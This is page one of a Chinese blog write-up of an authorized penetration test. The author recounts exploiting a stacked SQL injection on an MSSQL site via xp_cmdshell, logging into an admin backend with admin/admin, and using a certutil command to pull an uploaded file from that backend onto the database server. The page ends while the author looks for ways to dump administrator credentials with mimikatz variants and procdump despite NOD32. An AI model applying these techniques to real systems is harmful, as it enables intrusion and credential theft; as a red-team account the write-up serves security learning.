记一次授权网络攻防演练：屡败屡战的一次实战经历

本文仅限技术研究与讨论，仅用于信息防御技术，严禁用于非法用途，否则产生的一切后果自行承担！ 
这几天为了给大家分享技术干货，可以用废寝忘食来形容了！现在疫情还是依旧很严峻，大家还是呆在家里安安静静看我的文章吧，别出去溜达了！如果我的技术搞能让你呆在家里，我也算为社会做贡献了哈！
本次的技术搞还得从去年护网开始说起，当时我被甲方邀请作为攻击手，对他们的系统做定向授权渗透，只要getshell,就有8000元的奖励！作为一名白帽子，啥也不说了，开干！一开始以为会比较顺利，但是……

0×01 渗透复盘
众所周知，一次完整的攻击流程包括：信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等7步。
一切一切的起源来自于一个注入点……
http://www.z*****.com/****.aspx?lmid=11&acid=38917

Note:mssql的DBA权限，有点渗透经验的人，看到这个画面就知道这个站已经死了……
But !!! 事实总是那么出乎意料 
由于支持堆叠注入，堆叠注入大家应该都熟悉吧！我就不废话了，经过–os-shell调用xp_cmdshell，发现是system权限，但是执行各种命令后绝望的发现—>库站分离+数据库服务器不通外网。 更绝望的是，数据库服务器上有NOD32，关于这个玩意咱们以后再说。

数据库不通外网，只能从网站后台下手，悲催的是我一没找到后台，二没admin相关表名
那就只能旁站了，如果能找到aspx的旁站，也许使用的是同一个数据库，这样我跨库找admin密码还是很有机会的！
然而结果旁站不是报502就是直接跳转到其他子域名的登录界面,和无语。。。。。。
事情反常，必有妖！这个时候我意识到好像是条”大鱼”(有一些子域名，有单独的登录域名，旁站都是该网站的相关站点)
既然探测到一些子域名，那我们继续挖掘更多的子域名。
给大家分享2个很好用的子域名挖掘神器吧 
https://phpinfo.me/domain/   
还有我最喜欢的subDomainsBrute

挖到域名后，弱密码admin/admin进入 后台(http://*p.z****.com/admin )
但这个后台是java写的，上传点只有ckfinder，这个编辑器也是无解的

我试图在后台找到注入点，然而并没有，并且就算有注入点，由于我已经进了后台，大概率对我也没有鸟帮助！
看起来这个后台和前面的数据库一样，并没有什么卵用，但是两者可以进行一定配合来抓取数据库服务器的administrator密码，如果有windows密码的话，可能用来登录外网哈
服务器的3389端口，因为大部分管理员都喜欢设置成同一个密码。
数据库虽然不通外网，但是他们内网对自己公司的外网域名还是解析的—>我可以通过这个后台来向内网传递文件，开心开心！
我先在http://*p.z****.com/admin上传1.flv文件，由于图片文件有文件内容检测，so，只能传flash文件

然后在http://www.z*****.com/的注入点上用xp_cmdshell执行：
certutil -urlcache -split -f http://*p.z****.com/upload/1.flv 

成功传递文件
然而噩梦才刚刚开始……  NOD32杀掉了一切mimikatz变形工具
从如下检测链接可以看出来，NOD32和卡巴斯基不愧为最强杀毒，其他杀软的静态查杀全部miss，只有这两个绕不过去
http://r.virscan.org/language/zh … 4e60e71747398c9bc9e
这个时候我就特怀念起procdump了，虽然每次使用都需要下载一个30M-100M的lsass.dmp文件，但确实免杀好用。但就算把procdump上传上去了，我该如何把lsass.dmp文件传递出来呢？
Bingo!
这里我想到了curl.exe，用curl.exe是可以加cookie上传的，但是http://*p.z****.com/admin最大只支持2M文件上传。我既无法将curl.exe传递进去，也无法将lsass.dmp文件传递出来。也许还有文件压缩分割的办法，但实在太麻烦，还不如去找其他免杀的!
我找啊找……  皇天不负有心人，我终于找到了能免杀NOD32的mimikatz变形工具。
https://github.com/3gstudent/Hom … ekurlsa-wdigest.cpp

[1] [2] [3]  下一页